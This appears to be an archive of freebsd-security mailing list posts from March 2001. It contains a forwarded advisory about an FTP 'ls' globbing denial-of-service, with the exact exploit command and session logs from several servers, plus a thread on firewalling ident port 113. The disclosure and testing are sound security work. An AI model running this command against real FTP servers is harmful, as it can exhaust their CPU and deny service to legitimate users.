Received: (qmail 10725 invoked by uid 1000); 15 Mar 2001 20:21:16 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
by localhost with SMTP; 15 Mar 2001 20:21:16 -0000
Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy <bra@fsn.hu>
X-X-Sender: <bra@k2.jozsef.kando.hu>
To: <freebsd-security@FreeBSD.ORG>
Subject: Multiple vendors FTP denial of service (fwd)
Message-ID: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
-STABLE.
---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service
- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.
Here's a simple exploit, tested on the Proftpd site :
$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed
That command takes 100% CPU time on the server. It can lead into an easy
DOS even if few remote simultanous connections are allowed.
Other FTP servers may be concerned as well. Here are various tries :
- NetBSD FTP showed the same behavior than Proftpd :
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out. Connection closed
So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
possible DOS. Other BSD FTP may be affected as well.
- Microsoft FTP Service (Version 5.0) seems also confused by the command :
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)
- Publicfile refuses the command :
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.
- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
displayed.
- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.
Maintainers of vulnerable servers have been warned of this bug.
--
-=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
LINAGORA SA (Paris, France) : http://www.linagora.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 12:35:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
by hub.freebsd.org (Postfix) with ESMTP id 9C0F837B746
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:35:18 -0800 (PST)
(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id UAA14780; Thu, 15 Mar 2001 20:33:36 GMT
Message-ID: <3AB1261F.23B8BE75@algroup.co.uk>
Date: Thu, 15 Mar 2001 20:29:19 +0000
From: Adam Laurie <adam@algroup.co.uk>
Organization: A.L. Group plc
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams <nate@yogotech.com>
Cc: Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Nate Williams wrote:
>
> > Could anybody say me when I need to allow the port 113
> > in the firewall?
>
> *Need* form auth is a strong word. However, it does tend to speed up
> email transfers is you enable a version that always responds true.
>
> So, any external SMTP servers you have *should* have this port enabled.
>
> > What services use this port?
>
> I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> irc also uses it.
smtp does not need to use it - you can achieve the same speedy transfers
by telling your smtp server not to bother. e.g. for sendmail:
O Timeout.ident=0s
> > For example: I have a computer that is only DNS server,
> > Does this port need allow connections the to DNS service work?
>
> I don't believe so, but someone will certainly correct me if I'm wrong.
dns does not need ident.
cheers,
Adam
--
Adam Laurie Tel: +44 (20) 8742 0755
A.L. Digital Ltd. Fax: +44 (20) 8742 5995
Voysey House http://www.thebunker.net
Barley Mow Passage http://www.aldigital.co.uk
London W4 4GB mailto:adam@algroup.co.uk
UNITED KINGDOM PGP key on keyservers
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 12:36:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
by hub.freebsd.org (Postfix) with ESMTP id E0FF737B71A
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:36:34 -0800 (PST)
(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA11956;
Thu, 15 Mar 2001 13:36:17 -0700 (MST)
(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
by nomad.yogotech.com (8.8.8/8.8.8) id NAA06986;
Thu, 15 Mar 2001 13:36:16 -0700 (MST)
(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.10176.676792.32675@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 13:36:16 -0700 (MST)
To: Adam Laurie <adam@algroup.co.uk>
Cc: Nate Williams <nate@yogotech.com>,
Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
In-Reply-To: <3AB1261F.23B8BE75@algroup.co.uk>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
<15025.5630.472269.543769@nomad.yogotech.com>
<3AB1261F.23B8BE75@algroup.co.uk>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > > Could anybody say me when I need to allow the port 113
> > > in the firewall?
> >
> > *Need* form auth is a strong word. However, it does tend to speed up
> > email transfers is you enable a version that always responds true.
> >
> > So, any external SMTP servers you have *should* have this port enabled.
> >
> > > What services use this port?
> >
> > I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> > irc also uses it.
>
> smtp does not need to use it - you can achieve the same speedy transfers
> by telling your smtp server not to bother. e.g. for sendmail:
>
> O Timeout.ident=0s
My local sendmail doesn't use *my* ident server, but remote sendmail
servers use *my* ident server, so using ident locally speeds up mail
transfers *to* my host.
I certainly don't use ident for local email. :)
Nate
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 12:39:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from satin.team.look.ca (satin.team.look.ca [207.136.94.3])
by hub.freebsd.org (Postfix) with ESMTP id ED95037B71A
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:39:32 -0800 (PST)
(envelope-from JTERLECKI@team.look.ca)
Received: by satin.team.look.ca with Internet Mail Service (5.5.2650.21)
id <G71H69Q8>; Thu, 15 Mar 2001 15:45:03 -0500
Message-ID: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
From: Jason Terlecki <JTERLECKI@team.look.ca>
To: Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 15:39:20 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
No,
this port is used by identd. Many IRC servers require you to be able =
to
respond on that port when you connect to it.
It allows daemons to determine the username of a connecting client.
Jason Terlecki
System Analyst - Internet
Look Communication - Montreal
-----Message d'origine-----
De : Ronan Lucio [mailto:ronan@melim.com.br]
Envoy=E9 : March 15, 2001 1:19 PM
=C0 : security@FreeBSD.ORG
Objet : Port 113
Hi all,
Could anybody say me when I need to allow the port 113
in the firewall?
What services use this port?
For example: I have a computer that is only DNS server,
Does this port need allow connections the to DNS service work?
Thank=B4s
Ronan Lucio
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
------------------------------------------------------------------------=
-
This email server is running an evaluation copy of the MailShield anti-
spam software. Please contact your email administrator if you have any
questions about this message. MailShield product info: =
www.mailshield.com
.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 13:41:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d156h168.resnet.uconn.edu (d156h168.resnet.uconn.edu [137.99.156.168])
by hub.freebsd.org (Postfix) with SMTP id 17BAE37B718
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 13:41:19 -0800 (PST)
(envelope-from sirmoo@cowbert.2y.net)
Received: (qmail 61572 invoked by alias); 15 Mar 2001 21:41:30 -0000
Received: from unknown (HELO sirmoobert) (137.99.158.30)
by d156h168.resnet.uconn.edu with SMTP; 15 Mar 2001 21:41:30 -0000
Message-ID: <002301c0ad98$a2677fa0$1e9e6389@137.99.156.23>
From: "Peter C. Lai" <sirmoo@cowbert.2y.net>
To: "Ronan Lucio" <ronan@melim.com.br>, <security@FreeBSD.ORG>
References: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 16:41:03 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
many IRC servers also require a valid rdns when doing the ident lookup. I
know when I am on a system which has no rdns, identd (port 113) is necessary
but not sufficient to let me connect to almost all EFNet servers.
----- Original Message -----
From: "Jason Terlecki" <JTERLECKI@team.look.ca>
To: "Ronan Lucio" <ronan@melim.com.br>; <security@FreeBSD.ORG>
Sent: Thursday, March 15, 2001 3:39 PM
Subject: RE: Port 113
No,
this port is used by identd. Many IRC servers require you to be able to
respond on that port when you connect to it.
It allows daemons to determine the username of a connecting client.
Jason Terlecki
System Analyst - Internet
Look Communication - Montreal
-----Message d'origine-----
De : Ronan Lucio [mailto:ronan@melim.com.br]
Envoyé : March 15, 2001 1:19 PM
À : security@FreeBSD.ORG
Objet : Port 113
Hi all,
Could anybody say me when I need to allow the port 113
in the firewall?
What services use this port?
For example: I have a computer that is only DNS server,
Does this port need allow connections the to DNS service work?
Thank´s
Ronan Lucio
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
-------------------------------------------------------------------------
This email server is running an evaluation copy of the MailShield anti-
spam software. Please contact your email administrator if you have any
questions about this message. MailShield product info: www.mailshield.com
.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 14: 9:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 6AAB837B71A
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:09:23 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id XAA62363;
Thu, 15 Mar 2001 23:09:17 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie <adam@algroup.co.uk>,
Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 15 Mar 2001 23:09:16 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 13:36:16 -0700 (MST)"
Message-ID: <xzpbsr2ptv7.fsf@flood.ping.uio.no>
Lines: 13
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Nate Williams <nate@yogotech.com> writes:
> My local sendmail doesn't use *my* ident server, but remote sendmail
> servers use *my* ident server, so using ident locally speeds up mail
> transfers *to* my host.
No, the problem only arises if you drop TCP 113 SYNs to the floor
instead of rejecting them (ipfw deny instead of ipfw reset); the
server times out waiting for you to reply. If you send an RST or an
ICMP UNREACH back, it'll give up immediately.
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 14:12:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
by hub.freebsd.org (Postfix) with ESMTP id 29BD837B719
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:12:32 -0800 (PST)
(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id PAA13545;
Thu, 15 Mar 2001 15:11:50 -0700 (MST)
(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
by nomad.yogotech.com (8.8.8/8.8.8) id PAA07956;
Thu, 15 Mar 2001 15:11:49 -0700 (MST)
(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.15908.270320.373266@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 15:11:48 -0700 (MST)
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: nate@yogotech.com (Nate Williams),
Adam Laurie <adam@algroup.co.uk>, Ronan Lucio <ronan@melim.com.br>,
security@FreeBSD.ORG
Subject: Re: Port 113
In-Reply-To: <xzpbsr2ptv7.fsf@flood.ping.uio.no>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
<15025.5630.472269.543769@nomad.yogotech.com>
<3AB1261F.23B8BE75@algroup.co.uk>
<15025.10176.676792.32675@nomad.yogotech.com>
<xzpbsr2ptv7.fsf@flood.ping.uio.no>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > My local sendmail doesn't use *my* ident server, but remote sendmail
> > servers use *my* ident server, so using ident locally speeds up mail
> > transfers *to* my host.
>
> No, the problem only arises if you drop TCP 113 SYNs to the floor
> instead of rejecting them (ipfw deny instead of ipfw reset); the
> server times out waiting for you to reply. If you send an RST or an
> ICMP UNREACH back, it'll give up immediately.
Hmm, I remember a long time ago where it was said (urban legend) that
even sending RST's confused older version of mail servers.
Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)
Nate
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 14:16:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 57B4237B719
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:16:31 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id XAA62454;
Thu, 15 Mar 2001 23:16:26 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: nate@yogotech.com (Nate Williams)
Cc: Adam Laurie <adam@algroup.co.uk>,
Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com> <3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com> <xzpbsr2ptv7.fsf@flood.ping.uio.no> <15025.15908.270320.373266@nomad.yogotech.com>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 15 Mar 2001 23:16:25 +0100
In-Reply-To: Nate Williams's message of "Thu, 15 Mar 2001 15:11:48 -0700 (MST)"
Message-ID: <xzp3dceptja.fsf@flood.ping.uio.no>
Lines: 11
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Nate Williams <nate@yogotech.com> writes:
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RST's confused older version of mail servers.
Huh? Sending an RST results in connect() returning ECONNREFUSED, just
like it would if there were no firewall and no identd. Any mail server
that can't handle ECONNREFUSED is broken beyond belief.
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 14:50: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10])
by hub.freebsd.org (Postfix) with ESMTP id 67C0B37B719
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:49:58 -0800 (PST)
(envelope-from fpscha@ns1.via-net-works.net.ar)
Received: (from fpscha@localhost)
by ns1.via-net-works.net.ar (8.9.3/8.9.3) id TAA16613;
Thu, 15 Mar 2001 19:50:23 -0300 (ART)
From: Fernando Schapachnik <fpscha@ns1.via-net-works.net.ar>
Message-Id: <200103152250.TAA16613@ns1.via-net-works.net.ar>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
"from Attila Nagy at Mar 15, 2001 09:21:16 pm"
To: Attila Nagy <bra@fsn.hu>
Date: Thu, 15 Mar 2001 19:50:23 -0300 (ART)
Cc: freebsd-security@FreeBSD.ORG
Reply-To: Fernando Schapachnik <fschapachnik@vianetworks.com.ar>
X-Mailer: ELM [version 2.4ME+ PL82 (25)]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
En un mensaje anterior, Attila Nagy escribió:
>
> FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> -STABLE.
Sure?
With 4.2-REL:
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
150 Opening ASCII mode data connection for '/bin/ls'.
226 Transfer complete.
ftp>
ftp> ls
150 Opening ASCII mode data connection for '/bin/ls'.
total 13
-rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc
drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm
-rw------- 1 fpscha wheel 1517 20 feb 09:28 .history
-rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login
[Everything normal, I mean]
Regards.
Fernando P. Schapachnik
Administración de la red
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 14:58:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
by hub.freebsd.org (Postfix) with ESMTP id 3456E37B718
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 14:58:37 -0800 (PST)
(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
by gndrsh.dnsmgr.net (8.9.3/8.9.3) id OAA51686;
Thu, 15 Mar 2001 14:58:01 -0800 (PST)
(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Message-Id: <200103152258.OAA51686@gndrsh.dnsmgr.net>
Subject: Re: Port 113
In-Reply-To: <15025.15908.270320.373266@nomad.yogotech.com> from Nate Williams at "Mar 15, 2001 03:11:48 pm"
To: nate@yogotech.com (Nate Williams)
Date: Thu, 15 Mar 2001 14:58:00 -0800 (PST)
Cc: des@ofug.org (Dag-Erling Smorgrav),
adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio),
security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > > My local sendmail doesn't use *my* ident server, but remote sendmail
> > > servers use *my* ident server, so using ident locally speeds up mail
> > > transfers *to* my host.
> >
> > No, the problem only arises if you drop TCP 113 SYNs to the floor
> > instead of rejecting them (ipfw deny instead of ipfw reset); the
> > server times out waiting for you to reply. If you send an RST or an
> > ICMP UNREACH back, it'll give up immediately.
>
> Hmm, I remember a long time ago where it was said (urban legend) that
> even sending RST's confused older version of mail servers.
There have been several problems over time with ipfw reset and icmp
on FreeBSD not doing the right things. I've seen several commits that
look like they may be addressing the problem but have not found the
time to test to see if they fixed it.
I know from first hand experience that using ipfw reset to try and
stop ident requests use to do little to nothing more than ipfw deny.
IIRC one of the problems I saw was that the icmp reset packet was
created with the address of the ipfw box, which caused it to be
ignored by the sending host. Don't know if that ever got fixed or
not though.
> Running the 'fake' ident server hasn't caused any problems AFAIK. :) :)
>
>
>
>
> Nate
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
--
Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15: 0: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from clone.registro.br (clone.REGISTRO.BR [143.108.23.4])
by hub.freebsd.org (Postfix) with ESMTP id 3AC7637B718
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:00:00 -0800 (PST)
(envelope-from fneves@registro.br)
Received: by clone.registro.br (Postfix, from userid 1000)
id 1F2C69293; Thu, 15 Mar 2001 19:59:58 -0300 (BRT)
Date: Thu, 15 Mar 2001 19:59:58 -0300
From: Frederico A C Neves <fneves@registro.br>
To: Fernando Schapachnik <fschapachnik@vianetworks.com.ar>
Cc: Attila Nagy <bra@fsn.hu>, freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315195957.S78129@registro.br>
References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu> <200103152250.TAA16613@ns1.via-net-works.net.ar>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Thu, Mar 15, 2001 at 07:50:23PM -0300
X-Operating-System: FreeBSD
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
until we kill ftpd.
On Thu, Mar 15, 2001 at 07:50:23PM -0300, Fernando Schapachnik wrote:
> En un mensaje anterior, Attila Nagy escribió:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
> Sure?
>
> With 4.2-REL:
>
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> 150 Opening ASCII mode data connection for '/bin/ls'.
> 226 Transfer complete.
> ftp>
> ftp> ls
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 13
> -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc
> drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm
> -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history
> -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login
>
> [Everything normal, I mean]
>
>
> Regards.
>
> Fernando P. Schapachnik
> Administración de la red
> VIA NET.WORKS ARGENTINA S.A.
> fschapachnik@vianetworks.com.ar
> Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
--
Frederico A C Neves Registro .br - R.Pio XI, 1500
+55 11 3838-4130 São Paulo, SP, Brazil - 05468-901
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15:14:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
by hub.freebsd.org (Postfix) with ESMTP id EFD5B37B719
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:14:55 -0800 (PST)
(envelope-from mike@sentex.net)
Received: from chimp (fcage [192.168.0.2])
by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2FNEsg62264
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 18:14:54 -0500 (EST)
(envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010315181354.02a035d0@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Thu, 15 Mar 2001 18:14:53 -0500
To: freebsd-security@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>
References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
4.1 from Aug 10th is hurt by it.
---Mike
At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote:
>En un mensaje anterior, Attila Nagy escribi=F3:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
>Sure?
>
>With 4.2-REL:
>
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>150 Opening ASCII mode data connection for '/bin/ls'.
>226 Transfer complete.
>ftp>
>ftp> ls
>150 Opening ASCII mode data connection for '/bin/ls'.
>total 13
>-rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc
>drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm
>-rw------- 1 fpscha wheel 1517 20 feb 09:28 .history
>-rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login
>
>[Everything normal, I mean]
>
>
>Regards.
>
>Fernando P. Schapachnik
>Administraci=F3n de la red
>VIA NET.WORKS ARGENTINA S.A.
>fschapachnik@vianetworks.com.ar
>Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
